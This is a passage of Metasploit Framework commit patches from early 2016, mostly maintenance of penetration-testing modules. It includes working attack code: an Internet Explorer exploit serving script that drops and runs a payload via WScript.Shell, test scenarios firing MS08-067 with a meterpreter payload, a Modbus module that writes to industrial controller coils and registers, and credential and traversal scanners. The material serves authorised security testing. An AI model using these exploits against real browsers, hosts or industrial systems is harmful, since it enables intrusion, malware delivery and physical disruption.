- - Name : VERBOSE - Current Setting: false - Description : Enable detailed status messages - - Name : WORKSPACE - Current Setting: - Description : Specify the workspace for this module - - Name : WfsDelay - Current Setting: 0 - Description : Additional delay when waiting for a session - """ - - @targets - Scenario: Show RHOST/etc variable expansion from a config file - When I type "use exploit/windows/smb/ms08_067_netapi" - When RHOST is WINDOWS - And I type "set PAYLOAD windows/meterpreter/bind_tcp" - And I type "show options" - And I type "run" - And I type "exit" - And I type "exit" - Then the output should match /spider-wxp/ + When I run `msfconsole --environment test -q -r ms08-067.rc -x exit` + Then the output should contain "[*] Exploit completed, 1 session was created." diff --git a/features/support/targets.yml.example b/features/support/targets.yml.example index 75f4b9915d..0752a6cc7e 100644 --- a/features/support/targets.yml.example +++ b/features/support/targets.yml.example @@ -1,2 +1,7 @@ -WINDOWS: spider-wxp.vuln.lax.rapid7.com -LINUX: spider-ubuntu.vuln.lax.rapid7.com +windows: + - + hostname: wxpsp0 + ip: 127.0.0.100 + - + hostname: wxpsp2 + ip: 127.0.0.101 diff --git a/lib/tasks/custom_cucumber.rake b/lib/tasks/custom_cucumber.rake index 3dab9d0697..9b8c3fb8ae 100644 --- a/lib/tasks/custom_cucumber.rake +++ b/lib/tasks/custom_cucumber.rake @@ -12,6 +12,12 @@ begin t.fork = true # You may get faster startup if you set this to false t.profile = 'boot' end + Cucumber::Rake::Task.new({:exploit => 'db:test:prepare'}, 'Run features that should pass') do |t| + t.binary = vendored_cucumber_bin # If nil, the gem's binary is used. + t.fork = true # You may get faster startup if you set this to false + t.profile = 'exploit' + end + end rescue LoadError From 96c4fc5bbf3c1675b26e4c4420870a7fff55d578 Mon Sep 17 00:00:00 2001 From: darkbushido <lance.sanchez@gmail.com> Date: Thu, 4 Feb 2016 13:37:36 -0600 Subject: [PATCH 275/686] updating ms08067 --- features/modules/exploit/smb/ms08_067_netapi.feature | 10 +++++----- features/step_definitions/targets.rb | 10 ---------- 2 files changed, 5 insertions(+), 15 deletions(-) delete mode 100644 features/step_definitions/targets.rb diff --git a/features/modules/exploit/smb/ms08_067_netapi.feature b/features/modules/exploit/smb/ms08_067_netapi.feature index 9a9cf04ddf..6647c7083a 100644 --- a/features/modules/exploit/smb/ms08_067_netapi.feature +++ b/features/modules/exploit/smb/ms08_067_netapi.feature @@ -8,19 +8,19 @@ Feature: MS08-067 netapi Scenario: The MS08-067 should get a session with bind_tcp Given I ready the windows targets - And a file named "ms08-067.rc" with: + Given a file named "ms08-067-bind.rc" with: """ <ruby> hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml') self.run_single('use exploit/windows/smb/ms08_067_netapi') self.run_single('set payload windows/meterpreter/bind_tcp') hosts['windows'].each do |host| - self.run_single("set RHOST #{host['ip']}") + self.run_single("set RHOST #{host['ipAddress']}") self.run_single('run') sleep 1 end - </ruby> """ - When I run `msfconsole --environment test -q -r ms08-067.rc -x exit` - Then the output should contain "[*] Exploit completed, 1 session was created." + When I run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` + Then the 'Mdm::Host' table contains the targets from 'features/support/targets.yml' + \ No newline at end of file diff --git a/features/step_definitions/targets.rb b/features/step_definitions/targets.rb deleted file mode 100644 index 7c14393d0e..0000000000 --- a/features/step_definitions/targets.rb +++ /dev/null @@ -1,10 +0,0 @@ -When /^targets are loaded$/ do - config_file = File.expand_path('features/support/targets.yml') - fail "Target config file #{config_file} does not exist" unless File.exists?(config_file) - @target_config = YAML.load_file(config_file) -end - -When /^(RHOSTS?) (?:are|is) (\S+)$/ do |type, target_type| - fail "No target type #{target_type}" unless @target_config.key?(target_type) - step "I type \"set #{type} #{@target_config[target_type]}\"" -end From 4cea6c023674d6fd3fd3a828d6451f33d8a30c98 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 4 Feb 2016 15:12:57 -0600 Subject: [PATCH 276/686] Update ie_unsafe_scripting to use BrowserExploitServer This patch updates the ie_unsafe_scripting exploit to use the BrowserExploitServer mixin in order to implement a JavaScript check. The JS check allows the exploit to determine whether or not it is in the poorly configured zone before firing. It also adds another datastore option to carefully avoid IEs that come with Protected Mode enabled by default. This is even though IE allows unsafe ActiveX, PM could still block the malicious VBS or Powershell execution by showing a security prompt. This is not ideal during BrowserAutopwn. And finally, since BAP2 can automatically load this exploit, we bump the MaxExploitCount to 22 to continue favoring the adobe_flash_uncompress_zlib_uninitialized module to be on the default list. Resolves #6341 for the purpose of better user experience. --- modules/auxiliary/server/browser_autopwn2.rb | 2 +- .../windows/browser/ie_unsafe_scripting.rb | 89 ++++++++++++++----- 2 files changed, 67 insertions(+), 24 deletions(-) diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb index 1c28beee94..24e7d68f64 100644 --- a/modules/auxiliary/server/browser_autopwn2.rb +++ b/modules/auxiliary/server/browser_autopwn2.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary register_advanced_options([ OptInt.new('ExploitReloadTimeout', [false, 'Number of milliseconds before trying the next exploit', 3000]), - OptInt.new('MaxExploitCount', [false, 'Number of browser exploits to load', 21]), + OptInt.new('MaxExploitCount', [false, 'Number of browser exploits to load', 22]), OptString.new('HTMLContent', [false, 'HTML Content', '']), OptAddressRange.new('AllowedAddresses', [false, "A range of IPs you're interested in attacking"]), OptInt.new('MaxSessionCount', [false, 'Number of sessions to get', -1]), diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb index caab7e277b..5ea2ca6140 100644 --- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb +++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb @@ -10,14 +10,23 @@ require 'msf/core/exploit/powershell' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::EXE include Msf::Exploit::Powershell + VULN_CHECK_JS = %Q| + try { + new ActiveXObject("WScript.Shell"); + new ActiveXObject("Scripting.FileSystemObject"); + is_vuln = true; + } catch(e) {} + | + + def initialize(info = {}) super(update_info(info, - 'Name' => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration', - 'Description' => %q{ + 'Name' => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration', + 'Description' => %q{ This exploit takes advantage of the "Initialize and script ActiveX controls not marked safe for scripting" setting within Internet Explorer. When this option is set, IE allows access to the WScript.Shell ActiveX control, which allows javascript to @@ -36,43 +45,77 @@ class Metasploit3 < Msf::Exploit::Remote IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from an x64 iexplore.exe. + + By default, this module will not attempt to fire against IEs that come with Protected + Mode enabled by default, because it can trigger a security prompt. However, if you are + feeling brave, you can choose to ignore this restriction by setting the ALLOWPROMPT + datastore option to true. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ 'natron', 'Ben Campbell' # PSH and remove ADODB.Stream ], - 'References' => + 'References' => [ [ 'URL', 'http://support.microsoft.com/kb/182569' ], [ 'URL', 'http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html' ], [ 'URL', 'http://support.microsoft.com/kb/870669'] ], - 'DisclosureDate' => 'Sep 20 2010', - 'Platform' => 'win', - 'Targets' => + 'DisclosureDate' => 'Sep 20 2010', + 'Platform' => 'win', + 'BrowserRequirements' => { + source: 'script', + os_name: OperatingSystems::Match::WINDOWS, + ua_name: HttpClients::IE, + vuln_test: VULN_CHECK_JS, + vuln_test_error: 'WScript.Shell or Scripting.FileSystemObject not allowed by browser.' + }, + 'Arch' => ARCH_X86, + 'Targets' => [ - [ 'Windows x86/x64', { 'Arch' => ARCH_X86 } ] + [ 'Windows x86/x64', {} ] ], - 'DefaultOptions' => + 'DefaultOptions' => { 'HTTP::compression' => 'gzip' }, - 'DefaultTarget' => 0)) + 'DefaultTarget' => 0 + )) register_options( [ - OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]), + OptBool.new('ALLOWPROMPT', [true, 'Allow exploit to ignore the protected mode prompt', false]), + OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]) ], self.class ) end - def on_request_uri(cli, request) + # Unfortunately we don't currently have an explicit way to check whether Protected Mode is + # actually enabled or not, so we can only rely on whatever is default on the OS. This should + # allow BAP2 to always fire without worrying about the prmopt popping up, but the user can + # still ignore this by setting ALLOWPROMPT to true in standalone mode. + def has_protected_mode_prompt?(browser) + if datastore['ALLOWPROMPT'] + return false + elsif OperatingSystems::Match::WINDOWS_XP === browser[:os_name] + return false + end + + true + end + + def on_request_exploit(cli, request, browser) + if has_protected_mode_prompt?(browser) + print_warning("This target possibly has Protected Mode, exploit aborted.") + send_not_found(cli) + return + end # Build out the HTML response page - var_shellobj = rand_text_alpha(rand(5)+5) + var_shellobj = rand_text_alpha(rand(5)+5) p = regenerate_payload(cli) if datastore['TECHNIQUE'] == 'VBS' @@ -92,10 +135,10 @@ class Metasploit3 < Msf::Exploit::Remote end def vbs_technique(var_shellobj, p) - var_fsobj = rand_text_alpha(rand(5)+5) - var_fsobj_file = rand_text_alpha(rand(5)+5) - var_vbsname = rand_text_alpha(rand(5)+5) - var_writedir = rand_text_alpha(rand(5)+5) + var_fsobj = rand_text_alpha(rand(5)+5) + var_fsobj_file = rand_text_alpha(rand(5)+5) + var_vbsname = rand_text_alpha(rand(5)+5) + var_writedir = rand_text_alpha(rand(5)+5) exe = generate_payload_exe({ :code => p.encoded }) vbs = Msf::Util::EXE.to_exe_vbs(exe) @@ -103,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote # Build the javascript that will be served js_content = %Q| -//<html><head></head><body><script> +<html><head></head><body><script> var #{var_shellobj} = new ActiveXObject("WScript.Shell"); var #{var_fsobj} = new ActiveXObject("Scripting.FileSystemObject"); var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%"); @@ -114,9 +157,9 @@ var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{ #{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true); #{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs"); -//</script></html> +</script></html> | - return js_content + js_content end def psh_technique(var_shellobj, p) @@ -128,6 +171,6 @@ var #{var_shellobj} = new ActiveXObject("WScript.Shell"); //</script></html> | - return js_content + js_content end end From 3c1ada46dd18234cd519cd3b9f259a2cc00dee9d Mon Sep 17 00:00:00 2001 From: Metasploit <metasploit@rapid7.com> Date: Fri, 5 Feb 2016 13:40:02 -0800 Subject: [PATCH 277/686] Bump version of framework to 4.11.10 --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 9037b236f5..e1c0b94ec5 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.11.9) + metasploit-framework (4.11.10) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 503ca905d8..68443720c0 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.9" + VERSION = "4.11.10" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From af3f6c4655f2ffd58bd117da52daa92236b43197 Mon Sep 17 00:00:00 2001 From: ghettoeinstein <csaunders1@toromail.csudh.edu> Date: Sat, 6 Feb 2016 09:27:05 -0800 Subject: [PATCH 278/686] Update msu_finder.rb Corrected spelling of "script" --- tools/exploit/msu_finder.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tools/exploit/msu_finder.rb b/tools/exploit/msu_finder.rb index b6d510e1dc..dbefc95b26 100755 --- a/tools/exploit/msu_finder.rb +++ b/tools/exploit/msu_finder.rb @@ -2,7 +2,7 @@ ### # -# This sceript will enumerate download links for Microsoft patches. +# This script will enumerate download links for Microsoft patches. # # Author: # * sinn3r @@ -768,4 +768,4 @@ TODO: * Make a gem * Make it generic in order to manage different kind of patches and providers * Multithreading -=end \ No newline at end of file +=end From 2171c344e5324165957d78acf245517984a79f37 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Sat, 6 Feb 2016 13:23:21 -0600 Subject: [PATCH 279/686] Fix #6539, correct a typo in report_cred Fix #6539 --- modules/auxiliary/scanner/http/cisco_ssl_vpn.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index 5ad7ed6458..2b3c052717 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -225,7 +225,7 @@ class Metasploit3 < Msf::Auxiliary do_logout(resp.get_cookies) - report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body) + report_cred(ip: rhost, port: rport, user: user, password: pass, proof: resp.body) report_note(ip: rhost, type: 'cisco.cred.group', data: "User: #{user} / Group: #{group}") return :next_user From e0e67f5507a062e1f98ba0fcad81328f8b1ff558 Mon Sep 17 00:00:00 2001 From: Brendan Coles <bcoles@gmail.com> Date: Sun, 7 Feb 2016 02:05:15 +0000 Subject: [PATCH 280/686] Remove unnecessary check for FILEPATH --- modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb | 5 ----- 1 file changed, 5 deletions(-) diff --git a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb index 820dec0607..cfaca39187 100644 --- a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb +++ b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb @@ -44,11 +44,6 @@ class Metasploit4 < Msf::Auxiliary end def run_host(ip) - if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty? - print_error('Please supply the name of the file you want to download') - return - end - file_path = datastore['FILEPATH'] packet = "\x43" packet << file_path From df825913b856cb0f9fb6b10be88232b81d11af1a Mon Sep 17 00:00:00 2001 From: Brendan Coles <bcoles@gmail.com> Date: Sun, 7 Feb 2016 07:11:47 +0000 Subject: [PATCH 281/686] Use default timeout --- modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb index cfaca39187..a0b4f6f11c 100644 --- a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb +++ b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb @@ -53,7 +53,7 @@ class Metasploit4 < Msf::Auxiliary vprint_status("#{peer} - Sending request (#{packet.length} bytes)") connect sock.put(packet) - res = sock.get(15) + res = sock.get disconnect unless res print_error("#{peer} - Unable to retrieve file due to a timeout.") From aaf1d2c312b6bc57605ad1c6981b5537babf1043 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Sun, 7 Feb 2016 12:26:37 -0600 Subject: [PATCH 282/686] Update downloadable link pattern for msu_finder --- tools/exploit/msu_finder.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/exploit/msu_finder.rb b/tools/exploit/msu_finder.rb index dbefc95b26..083026c1a5 100755 --- a/tools/exploit/msu_finder.rb +++ b/tools/exploit/msu_finder.rb @@ -255,7 +255,7 @@ module MicrosoftPatchFinder n = ::Nokogiri::HTML(res.body) n.search('a').select { |a| - a.attributes['href'] && a.attributes['href'].value.include?('http://download.microsoft.com/download/') + a.attributes['href'] && a.attributes['href'].value.include?('https://download.microsoft.com/download/') }.map! { |a| a.attributes['href'].value }.uniq end From 942eec5feeec7bd119ea2717fb575f65ab956510 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Sun, 7 Feb 2016 12:37:08 -0600 Subject: [PATCH 283/686] Update rspec --- spec/tools/msu_finder_spec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/spec/tools/msu_finder_spec.rb b/spec/tools/msu_finder_spec.rb index 8f1b498c9c..92229f7049 100644 --- a/spec/tools/msu_finder_spec.rb +++ b/spec/tools/msu_finder_spec.rb @@ -297,7 +297,7 @@ RSpec.describe MicrosoftPatchFinder do end let(:expected_link) do - 'http://download.microsoft.com/download/9/0/6/906BC7A4-7DF7-4C24-9F9D-3E801AA36ED3/Windows6.0-KB3087918-x86.msu' + 'https://download.microsoft.com/download/9/0/6/906BC7A4-7DF7-4C24-9F9D-3E801AA36ED3/Windows6.0-KB3087918-x86.msu' end let(:download_html_res) do From 40633ea7cd379e04159ce7504a2a92f0289720f1 Mon Sep 17 00:00:00 2001 From: Brendan Coles <bcoles@gmail.com> Date: Mon, 8 Feb 2016 01:11:18 +0000 Subject: [PATCH 284/686] Check filepath length --- modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb index a0b4f6f11c..57bc0754d5 100644 --- a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb +++ b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb @@ -45,6 +45,11 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) file_path = datastore['FILEPATH'] + if file_path.length > 67 + print_error("File path is longer than 67 characters. Try using MS-DOS 8.3 short file names.") + return + end + packet = "\x43" packet << file_path packet << "\x00" * (255 - file_path.length) From cd7046f2332eac7a775a8884d7c222277c517f8d Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Sun, 7 Feb 2016 23:15:46 -0600 Subject: [PATCH 285/686] Change method name "method" to "http_method" for http_traversal.rb We accidentally override "#method", which is bad. --- .../auxiliary/scanner/http/http_traversal.rb | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index 94947a2f96..51774421c0 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -82,8 +82,8 @@ class Metasploit3 < Msf::Auxiliary # Avoids writing to datastore['METHOD'] directly - def method - @method || datastore['METHOD'] + def http_method + @http_method || datastore['METHOD'] end # Avoids writing to datastore['DATA'] directly @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary def ini_request(uri) req = {} - case method + case http_method when 'GET' # Example: Say we have the following datastore['PATH'] # '/test.php?page=1&id=3¬e=whatever' @@ -162,7 +162,7 @@ class Metasploit3 < Msf::Auxiliary this_path = uri end - req['method'] = method + req['method'] = http_method req['uri'] = this_path req['headers'] = {'Cookie'=>datastore['COOKIE']} if not datastore['COOKIE'].empty? req['data'] = data if not data.empty? @@ -225,7 +225,7 @@ class Metasploit3 < Msf::Auxiliary :proof => trigger, :name => self.fullname, :category => "web", - :method => method + :method => http_method }) else @@ -289,9 +289,9 @@ class Metasploit3 < Msf::Auxiliary # def is_writable(trigger) # Modify some registered options for the PUT method - tmp_method = method + tmp_method = http_method tmp_data = data - @method = 'PUT' + @http_method = 'PUT' if data.empty? unique_str = Rex::Text.rand_text_alpha(4) * 4 @@ -310,7 +310,7 @@ class Metasploit3 < Msf::Auxiliary send_request_cgi(req, 25) # Prepare request to read our file - @method = 'GET' + @http_method = 'GET' @data = tmp_data req = ini_request(uri) vprint_status("Verifying upload...") @@ -324,7 +324,7 @@ class Metasploit3 < Msf::Auxiliary end # Ah, don't forget to restore our method - @method = tmp_method + @http_method = tmp_method end # @@ -337,8 +337,8 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) # Warn if it's not a well-formed UPPERCASE method - if method !~ /^[A-Z]+$/ - print_warning("HTTP method #{method} is not Apache-compliant. Try only UPPERCASE letters.") + if http_method !~ /^[A-Z]+$/ + print_warning("HTTP method #{http_method} is not Apache-compliant. Try only UPPERCASE letters.") end print_status("Running action: #{action.name}...") From c0a8b01c2b75c079338d7810fc4c5b744d89357c Mon Sep 17 00:00:00 2001 From: alexandrinetorrents <alexandrine.torrents@gmail.com> Date: Mon, 8 Feb 2016 13:13:51 +0100 Subject: [PATCH 286/686] Addition of multiple read/write to auxiliary/scanner/scada/modbusclient.rb --- .../auxiliary/scanner/scada/modbusclient.rb | 189 ++++++++++++++++-- 1 file changed, 168 insertions(+), 21 deletions(-) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index 70b5242414..1bb2e6c054 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -20,24 +20,31 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'EsMnemon <esm[at]mnemonic.no>', # original write-only module - 'Arnaud SOULLIE <arnaud.soullie[at]solucom.fr>' # new code that allows read/write + 'Arnaud SOULLIE <arnaud.soullie[at]solucom.fr>', # code that allows read/write + 'Alexandrine TORRENTS <alexandrine.torrents[at]eurecom.fr>', # code that allows reading/writing at multiple consecutive addresses + 'Mathieu CHEVALIER <mathieu.chevalier[at]eurecom.fr>' ], 'License' => MSF_LICENSE, 'Actions' => [ - ['READ_COIL', { 'Description' => 'Read one bit from a coil' } ], + ['READ_COILS', { 'Description' => 'Read bits from several coils' } ], + ['READ_REGISTERS', { 'Description' => 'Read words from several registers' } ], ['WRITE_COIL', { 'Description' => 'Write one bit to a coil' } ], - ['READ_REGISTER', { 'Description' => 'Read one word from a register' } ], - ['WRITE_REGISTER', { 'Description' => 'Write one word to a register' } ] + ['WRITE_REGISTER', { 'Description' => 'Write one word to a register' } ], + ['WRITE_COILS', { 'Description' => 'Write bits to several coils' } ], + ['WRITE_REGISTERS', { 'Description' => 'Write words to several registers' } ] ], - 'DefaultAction' => 'READ_REGISTER' + 'DefaultAction' => 'READ_REGISTERS' )) register_options( [ Opt::RPORT(502), - OptInt.new('DATA', [false, "Data to write (WRITE_COIL and WRITE_REGISTER modes only)"]), OptInt.new('DATA_ADDRESS', [true, "Modbus data address"]), + OptInt.new('NUMBER', [false, "Number of coils/registers to read (READ_COILS ans READ_REGISTERS modes only)", 1]), + OptInt.new('DATA', [false, "Data to write (WRITE_COIL and WRITE_REGISTER modes only)"]), + OptString.new('DATA_COILS', [false, "Data in binary to write (WRITE_COILS mode only) e.g. 0110"]), + OptString.new('DATA_REGISTERS', [false, "Words to write to each register separated with a comma (WRITE_REGISTERS mode only) e.g. 1,2,3,4"]), OptInt.new('UNIT_NUMBER', [false, "Modbus unit number", 1]), ], self.class) @@ -63,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary payload = [datastore['UNIT_NUMBER']].pack("c") payload += [@function_code].pack("c") payload += [datastore['DATA_ADDRESS']].pack("n") - payload += [1].pack("n") + payload += [datastore['NUMBER']].pack("n") make_payload(payload) end @@ -79,6 +86,21 @@ class Metasploit3 < Msf::Auxiliary packet_data end + def make_write_coils_payload(data, byte) + payload = [datastore['UNIT_NUMBER']].pack("c") + payload += [@function_code].pack("c") + payload += [datastore['DATA_ADDRESS']].pack("n") + payload += [datastore['DATA_COILS'].size].pack("n") # bit count + payload += [byte].pack("c") # byte count + for i in 0..(byte-1) + payload += [data[i]].pack("b*") + end + + packet_data = make_payload(payload) + + packet_data + end + def make_write_register_payload(data) payload = [datastore['UNIT_NUMBER']].pack("c") payload += [@function_code].pack("c") @@ -88,6 +110,19 @@ class Metasploit3 < Msf::Auxiliary make_payload(payload) end + def make_write_registers_payload(data, size) + payload = [datastore['UNIT_NUMBER']].pack("c") + payload += [@function_code].pack("c") + payload += [datastore['DATA_ADDRESS']].pack("n") + payload += [size].pack("n") # word count + payload += [2*size].pack("c") # byte count + for i in 0..(size-1) + payload += [data[i]].pack("n") + end + + make_payload(payload) + end + def handle_error(response) case response.reverse.unpack("c")[0].to_i when 1 @@ -106,34 +141,57 @@ class Metasploit3 < Msf::Auxiliary return end - def read_coil + def read_coils + if datastore['NUMBER']+datastore['DATA_ADDRESS'] > 65535 + print_error("Coils addresses go from 0 to 65535. You cannot go beyond.") + return + end @function_code = 0x1 - print_status("Sending READ COIL...") + print_status("Sending READ COILS...") response = send_frame(make_read_payload) + values = [] if response.nil? - print_error("No answer for the READ COIL") + print_error("No answer for the READ COILS") return elsif response.unpack("C*")[7] == (0x80 | @function_code) handle_error(response) elsif response.unpack("C*")[7] == @function_code - value = response[9].unpack("c")[0] - print_good("Coil value at address #{datastore['DATA_ADDRESS']} : #{value}") + loop = (datastore['NUMBER']-1)/8 + for i in 0..loop + bin_value = response[9+i].unpack("b*")[0] + list = bin_value.split("") + for j in 0..7 + list[j] = list[j].to_i + values[i*8 + j] = list[j] + end + end + values = values[0..(datastore['NUMBER']-1)] + print_good("#{datastore['NUMBER']} coil values from address #{datastore['DATA_ADDRESS']} : ") + print_good("#{values}") else print_error("Unknown answer") end end - def read_register + def read_registers + if datastore['NUMBER']+datastore['DATA_ADDRESS'] > 65535 + print_error("Registers addresses go from 0 to 65535. You cannot go beyond.") + return + end @function_code = 3 - print_status("Sending READ REGISTER...") + print_status("Sending READ REGISTERS...") response = send_frame(make_read_payload) + values = [] if response.nil? - print_error("No answer for the READ REGISTER") + print_error("No answer for the READ REGISTERS") elsif response.unpack("C*")[7] == (0x80 | @function_code) handle_error(response) elsif response.unpack("C*")[7] == @function_code - value = response[9..10].unpack("n")[0] - print_good("Register value at address #{datastore['DATA_ADDRESS']} : #{value}") + for i in 0..(datastore['NUMBER']-1) + values.push(response[9+2*i..10+2*i].unpack("n")[0]) + end + print_good("#{datastore['NUMBER']} register values from address #{datastore['DATA_ADDRESS']} : ") + print_good("#{values}") else print_error("Unknown answer") end @@ -162,6 +220,39 @@ class Metasploit3 < Msf::Auxiliary end end + def write_coils + @function_code = 15 + temp = datastore['DATA_COILS'] + check = temp.split("") + if temp.size > 65535 + print_error("DATA_COILS size must be between 0 and 65535") + return + end + for j in check + if j=="0" or j=="1" + else + print_error("DATA_COILS value must only contain 0s and 1s without space") + return + end + end + byte_number = (temp.size-1)/8 + 1 + data = [] + for i in 0..(byte_number-1) + data.push(temp[(i*8+0)..(i*8+7)]) + end + print_status("Sending WRITE COILS...") + response = send_frame(make_write_coils_payload(data, byte_number)) + if response.nil? + print_error("No answer for the WRITE COILS") + elsif response.unpack("C*")[7] == (0x80 | @function_code) + handle_error(response) + elsif response.unpack("C*")[7] == @function_code + print_good("Values #{datastore['DATA_COILS']} successfully written from coil address #{datastore['DATA_ADDRESS']}") + else + print_error("Unknown answer") + end + end + def write_register @function_code = 6 if datastore['DATA'] < 0 || datastore['DATA'] > 65535 @@ -181,18 +272,74 @@ class Metasploit3 < Msf::Auxiliary end end + def write_registers + @function_code = 16 + check = datastore['DATA_REGISTERS'].split("") + for j in 0..(check.size-1) + if check[j] == "0" or check[j]== "1" or check[j]== "2" or check[j]== "3" or check[j]== "4" or check[j]== "5" or check[j]== "6" or check[j]== "7" or check[j]== "8" or check[j]== "9" or check[j]== "," + if check[j] == "," and check[j+1] == "," + print_error("DATA_REGISTERS cannot contain two consecutive commas") + return + end + else + print_error("DATA_REGISTERS value must only contain numbers and commas without space") + return + end + end + list = datastore['DATA_REGISTERS'].split(",") + if list.size+datastore['DATA_ADDRESS'] > 65535 + print_error("Registers addresses go from 0 to 65535. You cannot go beyond.") + return + end + data = [] + for i in 0..(list.size-1) + data[i] = list[i].to_i + end + for j in 0..(data.size-1) + if data[j] < 0 || data[j] > 65535 + print_error("Each word to write must be an integer between 0 and 65535 in WRITE_REGISTERS mode") + return + end + end + print_status("Sending WRITE REGISTERS...") + response = send_frame(make_write_registers_payload(data, data.size)) + if response.nil? + print_error("No answer for the WRITE REGISTERS") + elsif response.unpack("C*")[7] == (0x80 | @function_code) + handle_error(response) + elsif response.unpack("C*")[7] == @function_code + print_good("Values #{datastore['DATA_REGISTERS']} successfully written from registry address #{datastore['DATA_ADDRESS']}") + else + print_error("Unknown answer") + end + end + def run @modbus_counter = 0x0000 # used for modbus frames connect case action.name - when "READ_COIL" - read_coil - when "READ_REGISTER" - read_register + when "READ_COILS" + read_coils + when "READ_REGISTERS" + read_registers when "WRITE_COIL" write_coil when "WRITE_REGISTER" write_register + when "WRITE_COILS" + if datastore['DATA_COILS'] == nil + print_error("The following option is needed in WRITE_COILS mode: DATA_COILS.") + return + else + write_coils + end + when "WRITE_REGISTERS" + if datastore['DATA_REGISTERS'] == nil + print_error("The following option is needed in WRITE_REGISTERS mode: DATA_REGISTERS.") + return + else + write_registers + end else print_error("Invalid ACTION") end From 54566823f58d1650bd9675dd88cce4eb864c6f53 Mon Sep 17 00:00:00 2001 From: William Webb <william_webb@rapid7.com> Date: Mon, 8 Feb 2016 14:36:14 -0600 Subject: [PATCH 287/686] Add IBM TSM Fastback denial of service module --- modules/exploits/windows/misc/ibm_tsm_dos.rb | 96 ++++++++++++++++++++ 1 file changed, 96 